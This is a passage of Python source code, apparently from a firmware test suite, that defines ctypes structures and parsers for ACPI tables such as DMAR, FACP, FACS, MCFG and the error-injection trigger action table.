parse_xsdt = make_compat_parser("XSDT")
class DMARSubtable(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('subtype', ctypes.c_uint16),
('length', ctypes.c_uint16),
]
class DMARDeviceScopePath(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('pci_device', ctypes.c_uint8),
('pci_function', ctypes.c_uint8),
]
def DMARDeviceScope_factory(num_dev_scope_path):
class DMARDeviceScope(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('type', ctypes.c_uint8),
('length', ctypes.c_uint8),
('reserved', ctypes.c_uint16),
('enumeration_id', ctypes.c_uint8),
('start_bus_number', ctypes.c_uint8),
('paths', DMARDeviceScopePath * num_dev_scope_path),
]
return DMARDeviceScope
def dmar_device_scope_list(addr, length):
end = addr + length
field_list = list()
subtable_num = 0
base_len_DMARDeviceScope = ctypes.sizeof(DMARDeviceScope_factory(0))
len_DMARDeviceScopePath = ctypes.sizeof(DMARDeviceScopePath)
while addr < end:
subtable_num += 1
subtable = DMARDeviceScope_factory(0).from_address(addr)
num_dev_scope_path = (subtable.length - base_len_DMARDeviceScope) / len_DMARDeviceScopePath
cls = DMARDeviceScope_factory(num_dev_scope_path)
addr += subtable.length
field_list.append( ('subtable{}'.format(subtable_num), cls) )
return field_list
class drhd_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('include_pci_all', ctypes.c_uint8, 1),
]
class drhd_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', drhd_flags_bits),
]
def DMARSubtableDRHD_factory(field_list):
class subtables(bits.cdata.Struct):
_pack_ = 1
_fields_ = field_list
def __iter__(self):
for f in self._fields_:
yield getattr(self, f[0])
class DMARSubtableDRHD(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(DMARSubtable._fields_) + [
('flags', drhd_flags),
('reserved', ctypes.c_uint8),
('segment_number', ctypes.c_uint16),
('base_address', ctypes.c_uint64),
('device_scopes', subtables)
]
return DMARSubtableDRHD
def DMARSubtableRMRR_factory(field_list):
class subtables(bits.cdata.Struct):
_pack_ = 1
_fields_ = field_list
def __iter__(self):
for f in self._fields_:
yield getattr(self, f[0])
class DMARSubtableRMRR(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(DMARSubtable._fields_) + [
('reserved', ctypes.c_uint16),
('segment_number', ctypes.c_uint16),
('base_address', ctypes.c_uint64),
('limit_address', ctypes.c_uint64),
('device_scopes', subtables),
]
return DMARSubtableRMRR
class atsr_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('all_ports', ctypes.c_uint8, 1),
]
class atsr_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', atsr_flags_bits),
]
def DMARSubtableATSR_factory(field_list):
class subtables(bits.cdata.Struct):
_pack_ = 1
_fields_ = field_list
def __iter__(self):
for f in self._fields_:
yield getattr(self, f[0])
class DMARSubtableATSR(bits.cdata.Struct):
_pack = 1
_fields_ = copy.copy(DMARSubtable._fields_) + [
('flags', atsr_flags),
('reserved', ctypes.c_uint8),
('segment_number', ctypes.c_uint16),
('device_scopes', subtables),
]
return DMARSubtableATSR
class DMARSubtableRHSA(bits.cdata.Struct):
_pack = 1
_fields_ = copy.copy(DMARSubtable._fields_) + [
('reserved', ctypes.c_uint32),
('base_address', ctypes.c_uint64),
('proximity_domain', ctypes.c_uint32),
]
def DMARSubTableANDD_factory(obj_name_len):
class DMARSubTableANDD(bits.cdata.Struct):
_pack = 1
_fields_ = copy.copy(DMARSubtable._fields_) + [
('reserved', ctypes.c_uint8 * 3),
('device_num', ctypes.c_uint8),
('object_name', ctypes.c_char * obj_name_len),
]
return DMARSubTableANDD
def DMARSubtableUnknown_factory(data_len):
class DMARSubtableUnknown(bits.cdata.Struct):
_pack = 1
_fields_ = copy.copy(DMARSubtable._fields_) + [
('data', ctypes.c_uint8 * data_len),
]
return DMARSubtableUnknown
ACPI_DMAR_TYPE_DRHD = 0
ACPI_DMAR_TYPE_RMRR = 1
ACPI_DMAR_TYPE_ATSR = 2
ACPI_DMAR_TYPE_RHSA = 3
ACPI_DMAR_TYPE_ANDD = 4
def dmar_subtable_list(addr, length):
end = addr + length
field_list = list()
subtable_num = 0
base_len_DRHD = ctypes.sizeof(DMARSubtableDRHD_factory(list()))
base_len_RMRR = ctypes.sizeof(DMARSubtableRMRR_factory(list()))
base_len_ATSR = ctypes.sizeof(DMARSubtableATSR_factory(list()))
base_len_ANDD = ctypes.sizeof(DMARSubTableANDD_factory(0))
while addr < end:
subtable_num += 1
subtable = DMARSubtable.from_address(addr)
if subtable.subtype == ACPI_DMAR_TYPE_DRHD:
next_field_list = dmar_device_scope_list(addr + base_len_DRHD, subtable.length - base_len_DRHD)
cls = DMARSubtableDRHD_factory(next_field_list)
elif subtable.subtype == ACPI_DMAR_TYPE_RMRR:
next_field_list = dmar_device_scope_list(addr + base_len_RMRR, subtable.length - base_len_RMRR)
cls = DMARSubtableRMRR_factory(next_field_list)
elif subtable.subtype == ACPI_DMAR_TYPE_ATSR:
next_field_list = dmar_device_scope_list(addr + base_len_ATSR, subtable.length - base_len_ATSR)
cls = DMARSubtableATSR_factory(next_field_list)
elif subtable.subtype == ACPI_DMAR_TYPE_RHSA:
cls = DMARSubtableRHSA
elif subtable.subtype == ACPI_DMAR_TYPE_ANDD:
cls = DMARSubTableANDD_factory(subtable.length - base_len_ANDD)
else:
cls = DMARSubtableUnknown_factory(subtable.length - ctypes.sizeof(DMARSubtable))
addr += subtable.length
field_list.append( ('subtable{}'.format(subtable_num), cls) )
return field_list
class dmar_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('intr_remap', ctypes.c_uint8, 1),
('x2apic_opt_out', ctypes.c_uint8, 1),
]
class dmar_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', dmar_flags_bits),
]
def dmar_factory(field_list):
class subtables(bits.cdata.Struct):
_pack_ = 1
_fields_ = field_list
def __iter__(self):
for f in self._fields_:
yield getattr(self, f[0])
class DMAR_v1(bits.cdata.Struct):
_pack = 1
_fields_ = [
('header', TableHeader),
('host_addr_width', ctypes.c_uint8),
('flags', ctypes.c_uint8),
('reserved', ctypes.c_uint8 * 10),
('remapping_structures', subtables),
]
return DMAR_v1
def DMAR(val):
"""Create class based on decode of an DMAR table from address or filename."""
base_length = ctypes.sizeof(dmar_factory(list()))
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
hdr = TableHeader.from_address(addr)
field_list = dmar_subtable_list(addr + base_length, hdr.length - base_length)
if isinstance(val, str):
return dmar_factory(field_list).from_buffer_copy(data)
return dmar_factory(field_list).from_address(addr)
parse_dmar = make_compat_parser("DMAR")
class FixedFuncHwReg(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('Type', ctypes.c_uint8),
('VendorCode', ctypes.c_uint8),
('ClassCode', ctypes.c_uint8),
('Arg1', ctypes.c_uint8),
('Arg0', ctypes.c_uint64),
]
class GenericRegisterDescriptor(bits.cdata.Struct):
"""Generic Register Descriptor"""
_pack_ = 1
_fields_ = copy.copy(large_resource._fields_) + [
('length', ctypes.c_uint16),
('AddressSpaceId', ctypes.c_uint8),
('BitWidth', ctypes.c_uint8),
('BitOffset', ctypes.c_uint8),
('AccessSize', ctypes.c_uint8),
('Address', ctypes.c_uint64),
]
@property
def FFH(self):
if self.AddressSpaceId == ASID_FFH:
a = getattr(self.__class__, 'AddressSpaceId')
return FixedFuncHwReg.from_buffer(self, a.offset)
return None
def make_SingleRegisters(data):
if data is None:
return None
if isinstance(data, tuple):
if len(data) == 2:
if isinstance(data[0], GenericRegisterDescriptor):
if isinstance(data[1], EndTagDescriptor):
return SingleRegister(*data)
return tuple(make_SingleRegisters(v) for v in data)
return data
class SingleRegister(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('GenericRegister', GenericRegisterDescriptor),
('EndTag', EndTagDescriptor),
]
_preferred_pm_profile = {
0: 'Unspecified',
1: 'Desktop',
2: 'Mobile',
3: 'Workstation',
4: 'Enterprise Server',
5: 'SOHO Server',
6: 'Appliance PC',
7: 'Performance Server',
8: 'Tablet'
}
ASID_SYSTEM_MEMORY = 0
ASID_SYSTEM_IO = 1
ASID_PCI_CFG_SPACE = 2
ASID_EMBEDDED_CONTROLLER = 3
ASID_SMBUS = 4
ASID_PCC = 0xA
ASID_FFH = 0x7F
def _asid_str(asid):
if asid >= 0xC0 and asid <= 0xff:
return 'OEM Defined'
_asid = {
ASID_SYSTEM_MEMORY: 'System Memory',
ASID_SYSTEM_IO: 'System IO',
ASID_PCI_CFG_SPACE: 'PCI Configuration Space',
ASID_EMBEDDED_CONTROLLER: 'Embedded Controller',
ASID_SMBUS: 'SMBus',
ASID_PCC: 'Platform Communications Channel (PCC)',
ASID_FFH: 'Functional Fixed Hardware',
}
return _asid.get(asid, 'Reserved')
_access_sizes = {
0: 'Undefined',
1: 'Byte access',
2: 'Word access',
3: 'Dword access',
4: 'Qword access',
}
class GAS(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('address_space_id', ctypes.c_uint8),
('register_bit_width', ctypes.c_uint8),
('register_bit_offset', ctypes.c_uint8),
('access_size', ctypes.c_uint8),
('address', ctypes.c_uint64),
]
_formats = {
'address_space_id' : unpack.format_function("{:#x}", _asid_str),
'access_size' : unpack.format_table("{}", _access_sizes),
}
class facp_flags_bits_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('wbinvd', ctypes.c_uint32, 1),
('wbinvd_flush', ctypes.c_uint32, 1),
('proc_c1', ctypes.c_uint32, 1),
('p_lvl2_up', ctypes.c_uint32, 1),
('pwr_button', ctypes.c_uint32, 1),
('slp_button', ctypes.c_uint32, 1),
('fix_rtc', ctypes.c_uint32, 1),
('rtc_s4', ctypes.c_uint32, 1),
('tmr_val_ext', ctypes.c_uint32, 1),
('dck_cap', ctypes.c_uint32, 1),
]
class facp_flags_v1(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', facp_flags_bits_v1),
]
class FACP_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('firmware_ctrl', ctypes.c_uint32),
('dsdt', ctypes.c_uint32),
('int_model', ctypes.c_uint8),
('reserved0', ctypes.c_uint8),
('sci_int', ctypes.c_uint16),
('smi_cmd', ctypes.c_uint32),
('acpi_enable', ctypes.c_uint8),
('acpi_disable', ctypes.c_uint8),
('s4bios_req', ctypes.c_uint8),
('reserved1', ctypes.c_uint8),
('pm1a_evt_blk', ctypes.c_uint32),
('pm1b_evt_blk', ctypes.c_uint32),
('pm1a_cnt_blk', ctypes.c_uint32),
('pm1b_cnt_blk', ctypes.c_uint32),
('pm2_cnt_blk', ctypes.c_uint32),
('pm_tmr_blk', ctypes.c_uint32),
('gpe0_blk', ctypes.c_uint32),
('gpe1_blk', ctypes.c_uint32),
('pm1_evt_len', ctypes.c_uint8),
('pm1_cnt_len', ctypes.c_uint8),
('pm2_cnt_len', ctypes.c_uint8),
('pm_tmr_len', ctypes.c_uint8),
('gpe0_blk_len', ctypes.c_uint8),
('gpe1_blk_len', ctypes.c_uint8),
('gpe1_base', ctypes.c_uint8),
('reserved2', ctypes.c_uint8),
('p_lvl2_lat', ctypes.c_uint16),
('p_lvl3_lat', ctypes.c_uint16),
('flush_size', ctypes.c_uint16),
('flush_stride', ctypes.c_uint16),
('duty_offset', ctypes.c_uint8),
('duty_width', ctypes.c_uint8),
('day_alrm', ctypes.c_uint8),
('mon_alrm', ctypes.c_uint8),
('century', ctypes.c_uint8),
('reserved3', ctypes.c_uint8 * 3),
('flags', facp_flags_v1),
]
class facp_flags_bits_v3(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(facp_flags_bits_v1._fields_) + [
('reset_reg_sup', ctypes.c_uint32, 1),
('sealed_case', ctypes.c_uint32, 1),
('headless', ctypes.c_uint32, 1),
('cpu_sw_slp', ctypes.c_uint32, 1),
('pci_exp_wak', ctypes.c_uint32, 1),
('use_platform_clock', ctypes.c_uint32, 1),
('s4_rtc_sts_valid', ctypes.c_uint32, 1),
('remote_power_on_capable', ctypes.c_uint32, 1),
('force_apic_cluster_mode', ctypes.c_uint32, 1),
('force_apic_physical_destination_mode', ctypes.c_uint32, 1),
]
class facp_flags_v3(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', facp_flags_bits_v3),
]
class facp_iapc_arch_bits_v3(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('legacy_devices', ctypes.c_uint16, 1),
('8042', ctypes.c_uint16, 1),
('vga_not_present', ctypes.c_uint16, 1),
('msi_not_supported', ctypes.c_uint16, 1),
]
class facp_iapc_arch_v3(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint16),
('bits', facp_iapc_arch_bits_v3),
]
class FACP_v3(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('firmware_ctrl', ctypes.c_uint32),
('dsdt', ctypes.c_uint32),
('reserved0', ctypes.c_uint8),
('preferred_pm_profile', ctypes.c_uint8),
('sci_int', ctypes.c_uint16),
('smi_cmd', ctypes.c_uint32),
('acpi_enable', ctypes.c_uint8),
('acpi_disable', ctypes.c_uint8),
('s4bios_req', ctypes.c_uint8),
('pstate_cnt', ctypes.c_uint8),
('pm1a_evt_blk', ctypes.c_uint32),
('pm1b_evt_blk', ctypes.c_uint32),
('pm1a_cnt_blk', ctypes.c_uint32),
('pm1b_cnt_blk', ctypes.c_uint32),
('pm2_cnt_blk', ctypes.c_uint32),
('pm_tmr_blk', ctypes.c_uint32),
('gpe0_blk', ctypes.c_uint32),
('gpe1_blk', ctypes.c_uint32),
('pm1_evt_len', ctypes.c_uint8),
('pm1_cnt_len', ctypes.c_uint8),
('pm2_cnt_len', ctypes.c_uint8),
('pm_tmr_len', ctypes.c_uint8),
('gpe0_blk_len', ctypes.c_uint8),
('gpe1_blk_len', ctypes.c_uint8),
('gpe1_base', ctypes.c_uint8),
('cst_cnt', ctypes.c_uint8),
('p_lvl2_lat', ctypes.c_uint16),
('p_lvl3_lat', ctypes.c_uint16),
('flush_size', ctypes.c_uint16),
('flush_stride', ctypes.c_uint16),
('duty_offset', ctypes.c_uint8),
('duty_width', ctypes.c_uint8),
('day_alrm', ctypes.c_uint8),
('mon_alrm', ctypes.c_uint8),
('century', ctypes.c_uint8),
('iapc_boot_arch', facp_iapc_arch_v3),
('reserved1', ctypes.c_uint8),
('flags', facp_flags_v3),
('reset_reg', GAS),
('reset_value', ctypes.c_uint8),
('reserved2', ctypes.c_uint8 * 3),
('x_firmware_ctrl', ctypes.c_uint64),
('x_dsdt', ctypes.c_uint64),
('x_pm1a_evt_blk', GAS),
('x_pm1b_evt_blk', GAS),
('x_pm1a_cnt_blk', GAS),
('x_pm1b_cnt_blk', GAS),
('x_pm2_cnt_blk', GAS),
('x_pm_tmr_blk', GAS),
('x_gpe0_blk', GAS),
('x_gpe1_blk', GAS),
]
_formats = {
'preferred_pm_profile': unpack.format_table("{}", _preferred_pm_profile),
}
class facp_iapc_arch_bits_v4(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(facp_iapc_arch_bits_v3._fields_) + [
('pcie_aspm_controls', ctypes.c_uint16, 1),
]
class facp_iapc_arch_v4(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint16),
('bits', facp_iapc_arch_bits_v4),
]
class FACP_v4(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('firmware_ctrl', ctypes.c_uint32),
('dsdt', ctypes.c_uint32),
('reserved0', ctypes.c_uint8),
('preferred_pm_profile', ctypes.c_uint8),
('sci_int', ctypes.c_uint16),
('smi_cmd', ctypes.c_uint32),
('acpi_enable', ctypes.c_uint8),
('acpi_disable', ctypes.c_uint8),
('s4bios_req', ctypes.c_uint8),
('pstate_cnt', ctypes.c_uint8),
('pm1a_evt_blk', ctypes.c_uint32),
('pm1b_evt_blk', ctypes.c_uint32),
('pm1a_cnt_blk', ctypes.c_uint32),
('pm1b_cnt_blk', ctypes.c_uint32),
('pm2_cnt_blk', ctypes.c_uint32),
('pm_tmr_blk', ctypes.c_uint32),
('gpe0_blk', ctypes.c_uint32),
('gpe1_blk', ctypes.c_uint32),
('pm1_evt_len', ctypes.c_uint8),
('pm1_cnt_len', ctypes.c_uint8),
('pm2_cnt_len', ctypes.c_uint8),
('pm_tmr_len', ctypes.c_uint8),
('gpe0_blk_len', ctypes.c_uint8),
('gpe1_blk_len', ctypes.c_uint8),
('gpe1_base', ctypes.c_uint8),
('cst_cnt', ctypes.c_uint8),
('p_lvl2_lat', ctypes.c_uint16),
('p_lvl3_lat', ctypes.c_uint16),
('flush_size', ctypes.c_uint16),
('flush_stride', ctypes.c_uint16),
('duty_offset', ctypes.c_uint8),
('duty_width', ctypes.c_uint8),
('day_alrm', ctypes.c_uint8),
('mon_alrm', ctypes.c_uint8),
('century', ctypes.c_uint8),
('iapc_boot_arch', facp_iapc_arch_v4),
('reserved1', ctypes.c_uint8),
('flags', facp_flags_v3),
('reset_reg', GAS),
('reset_value', ctypes.c_uint8),
('reserved2', ctypes.c_uint8 * 3),
('x_firmware_ctrl', ctypes.c_uint64),
('x_dsdt', ctypes.c_uint64),
('x_pm1a_evt_blk', GAS),
('x_pm1b_evt_blk', GAS),
('x_pm1a_cnt_blk', GAS),
('x_pm1b_cnt_blk', GAS),
('x_pm2_cnt_blk', GAS),
('x_pm_tmr_blk', GAS),
('x_gpe0_blk', GAS),
('x_gpe1_blk', GAS),
]
_formats = {
'preferred_pm_profile': unpack.format_table("{}", _preferred_pm_profile),
}
class facp_flags_bits_v5(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(facp_flags_bits_v3._fields_) + [
('hw_reduced_acpi', ctypes.c_uint32, 1),
('low_power_s0_idle_capable', ctypes.c_uint32, 1),
]
class facp_flags_v5(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', facp_flags_bits_v5),
]
class facp_iapc_arch_bits_v5(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(facp_iapc_arch_bits_v4._fields_) + [
('cmos_rtc_not_present', ctypes.c_uint16, 1),
]
class facp_iapc_arch_v5(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint16),
('bits', facp_iapc_arch_bits_v5),
]
class FACP_v5(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('firmware_ctrl', ctypes.c_uint32),
('dsdt', ctypes.c_uint32),
('reserved0', ctypes.c_uint8),
('preferred_pm_profile', ctypes.c_uint8),
('sci_int', ctypes.c_uint16),
('smi_cmd', ctypes.c_uint32),
('acpi_enable', ctypes.c_uint8),
('acpi_disable', ctypes.c_uint8),
('s4bios_req', ctypes.c_uint8),
('pstate_cnt', ctypes.c_uint8),
('pm1a_evt_blk', ctypes.c_uint32),
('pm1b_evt_blk', ctypes.c_uint32),
('pm1a_cnt_blk', ctypes.c_uint32),
('pm1b_cnt_blk', ctypes.c_uint32),
('pm2_cnt_blk', ctypes.c_uint32),
('pm_tmr_blk', ctypes.c_uint32),
('gpe0_blk', ctypes.c_uint32),
('gpe1_blk', ctypes.c_uint32),
('pm1_evt_len', ctypes.c_uint8),
('pm1_cnt_len', ctypes.c_uint8),
('pm2_cnt_len', ctypes.c_uint8),
('pm_tmr_len', ctypes.c_uint8),
('gpe0_blk_len', ctypes.c_uint8),
('gpe1_blk_len', ctypes.c_uint8),
('gpe1_base', ctypes.c_uint8),
('cst_cnt', ctypes.c_uint8),
('p_lvl2_lat', ctypes.c_uint16),
('p_lvl3_lat', ctypes.c_uint16),
('flush_size', ctypes.c_uint16),
('flush_stride', ctypes.c_uint16),
('duty_offset', ctypes.c_uint8),
('duty_width', ctypes.c_uint8),
('day_alrm', ctypes.c_uint8),
('mon_alrm', ctypes.c_uint8),
('century', ctypes.c_uint8),
('iapc_boot_arch', facp_iapc_arch_v5),
('reserved1', ctypes.c_uint8),
('flags', facp_flags_v5),
('reset_reg', GAS),
('reset_value', ctypes.c_uint8),
('reserved2', ctypes.c_uint8 * 3),
('x_firmware_ctrl', ctypes.c_uint64),
('x_dsdt', ctypes.c_uint64),
('x_pm1a_evt_blk', GAS),
('x_pm1b_evt_blk', GAS),
('x_pm1a_cnt_blk', GAS),
('x_pm1b_cnt_blk', GAS),
('x_pm2_cnt_blk', GAS),
('x_pm_tmr_blk', GAS),
('x_gpe0_blk', GAS),
('x_gpe1_blk', GAS),
('sleep_control_reg', GAS),
('sleep_status_reg', GAS),
]
_formats = {
'preferred_pm_profile': unpack.format_table("{}", _preferred_pm_profile),
}
def FACP(val):
"""Create class based on decode of an FACP table from address or filename."""
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
hdr = TableHeader.from_address(addr)
if hdr.revision < 3:
cls = FACP_v1
elif hdr.revision == 3:
cls = FACP_v3
elif hdr.revision == 4:
cls = FACP_v4
else:
cls = FACP_v5
if isinstance(val, str):
return cls.from_buffer_copy(data)
return cls.from_address(addr)
parse_facp = make_compat_parser("FACP")
class facs_global_lock_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('pending', ctypes.c_uint32, 1),
('owned', ctypes.c_uint32, 1),
]
class facs_global_lock(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', facs_global_lock_bits),
]
class facs_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('s4bios_f', ctypes.c_uint32, 1),
]
class facs_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', facs_flags_bits),
]
class facs_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('s4bios_f', ctypes.c_uint32, 1),
]
class facs_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', facs_flags_bits),
]
class facs_flags_bits_v2(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('s4bios_f', ctypes.c_uint32, 1),
('64bit_wake_supported_f', ctypes.c_uint32, 1),
]
class facs_flags_v2(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', facs_flags_bits_v2),
]
class facs_ospm_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('64bit_wake_f', ctypes.c_uint32, 1),
]
class facs_ospm_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', facs_ospm_flags_bits),
]
class FACS_v0(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('signature', ctypes.c_char * 4),
('length', ctypes.c_uint32),
('hardware_signature', ctypes.c_uint32),
('firmware_waking_vector', ctypes.c_uint32),
('global_lock', facs_global_lock),
('flags', facs_flags),
('reserved', ctypes.c_uint8 * 40),
]
class FACS_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('signature', ctypes.c_char * 4),
('length', ctypes.c_uint32),
('hardware_signature', ctypes.c_uint32),
('firmware_waking_vector', ctypes.c_uint32),
('global_lock', facs_global_lock),
('flags', facs_flags),
('x_firmware_waking_vector', ctypes.c_uint64),
('version', ctypes.c_uint8),
('reserved', ctypes.c_uint8 * 31),
]
class FACS_v2(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('signature', ctypes.c_char * 4),
('length', ctypes.c_uint32),
('hardware_signature', ctypes.c_uint32),
('firmware_waking_vector', ctypes.c_uint32),
('global_lock', facs_global_lock),
('flags', facs_flags_v2),
('x_firmware_waking_vector', ctypes.c_uint64),
('version', ctypes.c_uint8),
('pad', ctypes.c_uint8 * 3),
('ospm_flags', facs_ospm_flags),
('reserved', ctypes.c_uint8 * 24),
]
def FACS(val):
"""Create class based on decode of an FACS table from address or filename."""
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
cls = FACS_v0
r = FACS_v0.from_address(addr)
if r.length != ctypes.sizeof(FACS_v0):
r = FACS_v1.from_address(addr)
if r.version == 1:
cls = FACS_v1
elif r.version == 2:
cls = FACS_v2
if isinstance(val, str):
return cls.from_buffer_copy(data)
return cls.from_address(addr)
parse_facs = make_compat_parser("FACS")
class MCFGResource(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('address', ctypes.c_uint64),
('segment', ctypes.c_uint16),
('start_bus', ctypes.c_uint8),
('end_bus', ctypes.c_uint8),
('reserved', ctypes.c_uint32),
]
def mcfg_factory(num_resources):
"""Create variable-sized MCFG table based on the number of resources."""
class MCFG(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('reserved', ctypes.c_uint64),
('resources', num_resources * MCFGResource),
]
return MCFG
def MCFG(val):
"""Create class based on decode of an MCFG table from address or filename."""
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
hdr = TableHeader.from_address(addr)
num_tables = (hdr.length - ctypes.sizeof(mcfg_factory(0))) / ctypes.sizeof(MCFGResource)
if isinstance(val, str):
return mcfg_factory(num_tables).from_buffer_copy(data)
return mcfg_factory(num_tables).from_address(addr)
parse_mcfg = make_compat_parser("MCFG")
class trigger_error_header(bits.cdata.Struct):
"""Trigger error header used with the trigger_error_action table."""
_pack_ = 1
_fields_ = [
('header_size', ctypes.c_uint32),
('revision', ctypes.c_uint32),
('table_size', ctypes.c_uint32),
('entry_count', ctypes.c_uint32),
]
def trigger_error_action_factory(num_entries):
"""Create variable-sized trigger error action table based on the number of trigger error instruction entries."""
class trigger_error_action(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', trigger_error_header),
('entries', num_entries * InjectionInstructionEntry),
]
return trigger_error_action
def trigger_error_action(val):
"""Create class based on decode of an trigger_error_action table from address or filename."""
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
hdr = trigger_error_header.from_address(addr)
num_entries = (hdr.table_size - ctypes.sizeof(trigger_error_action_factory(0))) / ctypes.sizeof(InjectionInstructionEntry)
if isinstance(val, str):
return trigger_error_action(num_entries).from_buffer_copy(data)
return trigger_error_action_factory(num_entries).from_address(addr)
_error_injection_action = {
0x0 : 'BEGIN_INJECTION_OPERATION',
0x1 : 'GET_TRIGGER_ERROR_ACTION_TABLE',
0x2 : 'SET_ERROR_TYPE',
0x3 : 'GET_ERROR_TYPE',
0x4 : 'END_OPERATION',
0x5 : 'EXECUTE_OPERATION',
0x6 : 'CHECK_BUSY_STATUS',
0x7 : 'GET_COMMAND_STATUS',
0x8 : 'SET_ERROR_TYPE_WITH_ADDRESS',
0xFF : 'TRIGGER_ERROR',
}
_error_injection_instruction = {
0x00 : 'READ_REGISTER',
0x01 : 'READ_REGISTER_VALUE',
0x02 : 'WRITE_REGISTER',
0x03 : 'WRITE_REGISTER_VALUE',
0x04 : 'NOOP',
}
class error_type_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('processor_correctable', ctypes.c_uint32, 1),
('processor_uncorrectable_non_fatal', ctypes.c_uint32, 1),
('processor_uncorrectable_fatal', ctypes.c_uint32, 1),
('memory_correctable', ctypes.c_uint32, 1),
('memory_uncorrectable_non_fatal', ctypes.c_uint32, 1),
('memory_uncorrectable_fatal', ctypes.c_uint32, 1),
('pci_express_correctable', ctypes.c_uint32, 1),
('pci_express_uncorrectable_non_fatal', ctypes.c_uint32, 1),
('pci_express_uncorrectable_fatal', ctypes.c_uint32, 1),
('platform_correctable', ctypes.c_uint32, 1),
('platform_uncorrectable_non_fatal', ctypes.c_uint32, 1),
('platform_encorrectable_fatal', ctypes.c_uint32, 1),
('reserved_12_30', ctypes.c_uint32, 19),
('vendor_defined', ctypes.c_uint32, 1),
]
class error_type_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', error_type_flags_bits),
]
class pcie_sbdf_struct_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('reserved_8_0', ctypes.c_uint32, 8),
('function_num', ctypes.c_uint32, 3),
('device_num', ctypes.c_uint32, 5),
('bus_num', ctypes.c_uint32, 8),
('pcie_segment', ctypes.c_uint32, 8),
]
class pcie_sbdf_struct(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', pcie_sbdf_struct_bits),
]
class set_error_type_with_addr_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('processor_apic_valid', ctypes.c_uint32, 1),
('memory_addr_and_mask_valid', ctypes.c_uint32, 1),
('pcie_sbdf_valid', ctypes.c_uint32, 1),
('reserved_31_3', ctypes.c_uint32, 29),
]
class set_error_type_with_addr_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', set_error_type_with_addr_flags_bits),
]
class set_error_type_with_addr(bits.cdata.Struct):
_pack_ = 1
